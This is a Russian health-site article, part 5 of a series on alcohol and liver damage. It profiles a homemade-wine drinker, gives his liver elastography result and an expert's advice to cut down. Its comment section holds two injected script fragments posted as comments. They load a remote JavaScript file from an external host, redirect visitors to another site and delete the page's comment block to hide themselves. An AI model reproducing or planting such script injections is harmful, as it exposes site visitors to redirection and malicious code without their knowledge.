Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чья печень в опасности: а...  >>  Чья печень в опасности: алкотипы. Часть 5
 
Обратная связь
 

Чья печень в опасности: алкотипы. Часть 5

Размер шрифта
05 декабря 2013 00:00
  • google_analytics: false
  • Нравится

Не секрет, что одним из главных врагов печени является алкоголь. А какие отношения с алкоголем у вас?

Чья печень в опасности: алкотипы. Часть 5

Алкоголизм был и остается настоящим бичом нашей страны, скашивая подчас целые деревни. Вред, наносимый этанолом нашему организму, огромен: по сути, нет ни одной системы органов, которая не страдала бы от злоупотребления алкогольными напитками. И в первую очередь это, разумеется, печень: кузница и страж человеческого организма.

Алкоголь постепенно приводит к перерождению печеночной ткани, которая замещается грубыми рубцами, не способными выполнять какие-либо функции. Конечной стадией этого процесса является цирроз – тяжелое необратимое состояние, которое в конечном итоге сводит человека в могилу.

В предыдущих статьях этого цикла мы уже рассказывали вам о необычном исследовании, в ходе которого изучалось состояние печени у ряда добровольцев. Все они относятся к разным социальным группам, работают на разных работах, проживают совершенно разные жизни, но объединяет их одно – страсть к алкоголю в той или иной степени. Ученые анализировали степень фиброза (рубцевания) печени с помощью специального метода – эластографии. Напомним, что результат в диапазоне от 7 до 14 кПа свидетельствует о повреждении печени, а более 14 кПа – о циррозе.

Сегодня мы продолжим наш рассказ.

Алкотип 5: любитель домашнего вина

Алексей Остапенко, 53 года, холост, кредитный консультант в одном из частных банков. Живет в Самаре. Рост – 167 см, вес – 54 кг, ИМТ 19

Употребление алкоголя: 35 единиц в неделю (1 единица = 10 мл)

Результат эластографии – 5,8 кПа (повод для беспокойства)

Комментарий пациента: «Честно говоря, я ожидал, что мой показатель будет пониже. Я привык считать себя здоровым человеком: придерживаюсь здорового питания, ем только домашнюю пищу, приготовленную из свежих продуктов (не переношу полуфабрикаты). И пусть я не занимаюсь спортом, я всегда был довольно худым.

Домашнее вино – моя маленькая слабость. Я его просто обожаю, пью каждый вечер! Однако мне казалось, что он не слишком вредно для здоровья, ведь в нем всего лишь 10% алкоголя, тогда как в магазинных образцах – до 14%.

Проблема в том что, когда ты сам делаешь вино, трудно побороть искушение и не пить его. Однако мой врач сказал, что в моем возрасте риск инфаркта повышается сам по себе, а алкоголь лишь подливает масла в огонь. Пожалуй, все-таки буду держать себя в узде».

Комментарий эксперта: «Алексей приближается к критической отметке 7 кПа.

Несмотря на то, что его домашнее вино содержит сравнительно мало этанола, алкогольным напитком оно, тем не менее, быть не перестает. А учитывая тот факт, что Алексей употребляет его в немалых количествах, можно с уверенностью утверждать, что таким образом он значительно повышает риск сердечно-сосудистых заболеваний, потому как алкоголь предрасполагает к развитию артериальной гипертензии и повышению уровня холестерина, а также напрямую влияет на сердечную мышцу.

У Алексея есть два варианта: либо он должен выделять три безалкогольных дня на неделе (чтобы печень успевала восстановиться), либо перейти на безалкогольное вино».

Загляните в наш специальный проект  «Заботься о печени», чтобы узнать еще больше об этом удивительном органе.

Узнайте все про другие алкотипы здесь:

Алкотип 1: алкоголь от случая к случаю,

Алкотип 2: ни дня без алкоголя,

Алкотип 3: алкоголь в прошлом,

Алкотип 4: алкоголь по выходным,

Алкотип 6: трезвенник.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:51

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Чья печень в опасности: алкотипы. Часть 3   Для кого алкоголь опасней всего   Чья печень в опасности: алкотипы. Часть 4   Что нельзя есть с больной печенью  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как студенческая жизнь влияет на здоровье
Что алкоголь делает с печенью
Как понять, что вы пьете много?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.